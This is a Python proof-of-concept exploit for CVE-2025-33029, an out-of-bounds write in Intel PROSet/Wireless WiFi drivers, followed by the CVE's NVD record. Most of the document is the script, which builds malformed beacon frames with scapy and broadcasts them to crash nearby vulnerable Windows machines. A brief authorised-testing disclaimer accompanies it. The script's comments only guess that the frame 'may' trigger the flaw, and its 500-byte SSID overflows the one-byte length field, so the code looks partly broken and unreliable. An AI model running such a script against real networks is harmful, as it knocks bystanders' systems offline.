CVE-2025-33029

''' CVE-2025-33029 PoC - Intel PROSet/Wireless WiFi Out-of-Bounds Write Note: This PoC is for educational and authorized testing purposes only. Author: Security Researcher (based on Intel INTEL-SA-01398 advisory) ''' #!/usr/bin/env python3 """ Intel PROSet/Wireless WiFi Driver - Out-of-Bounds Write PoC This script demonstrates the vulnerability in Intel PROSet/Wireless WiFi Software versions prior to 23.160. The vulnerability allows an adjacent network attacker to trigger an out-of-bounds write in the WiFi driver at Ring 2 (kernel level), causing a denial of service. WARNING: Only use on systems you have explicit permission to test. """ import struct import socket import sys from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11Elt, sendp def create_malicious_wifi_frame(): """ Create a malicious WiFi frame that may trigger the OOB write vulnerability. The vulnerability exists in how the driver handles malformed frames. """ # Create a malformed beacon frame with oversized information elements # The driver may not properly validate length fields before copying data ssid = b"A" * 500 # Excessive length to trigger boundary check failure # Craft radio tap header radio = RadioTap()/Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2="00:11:22:33:44:55", addr3="00:11:22:33:44:55") # Create beacon frame with malicious information elements beacon = Dot11Beacon(cap=0x2104) elt = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) # Add crafted vendor specific IE with oversized data vendor_ie = Dot11Elt(ID=221, info=b"\x00\x01\x02" + b"\xFF" * 256) frame = radio / beacon / elt / vendor_ie return frame def send_trigger_packets(interface, count=100): """ Send malformed WiFi frames to trigger the vulnerability. """ print(f"[*] Sending {count} malicious frames on interface: {interface}") print("[*] Target: Intel PROSet/Wireless WiFi Software < 23.160") print("[!] This may cause system instability or crash") frame = create_malicious_wifi_frame() try: for i in range(count): sendp(frame, iface=interface, verbose=0) if i % 10 == 0: print(f"[*] Sent {i} packets...") print("[*] Attack completed") except Exception as e: print(f"[!] Error: {e}") def check_vulnerability(): """ Check if target system is likely vulnerable. """ print("[*] CVE-2025-33029 Vulnerability Check") print("[*] Affected: Intel PROSet/Wireless WiFi Software < 23.160") print("[*] CVSS 3.1 Score: 7.4 (High)") print("[*] Attack Vector: Adjacent Network") print("[*] Requires: No authentication, No user interaction") if __name__ == "__main__": check_vulnerability() if len(sys.argv) > 1: send_trigger_packets(sys.argv[1]) else: print("Usage: python cve-2025-33029.py <wireless_interface>")

{"cve": {"id": "CVE-2025-33029", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:50.217", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}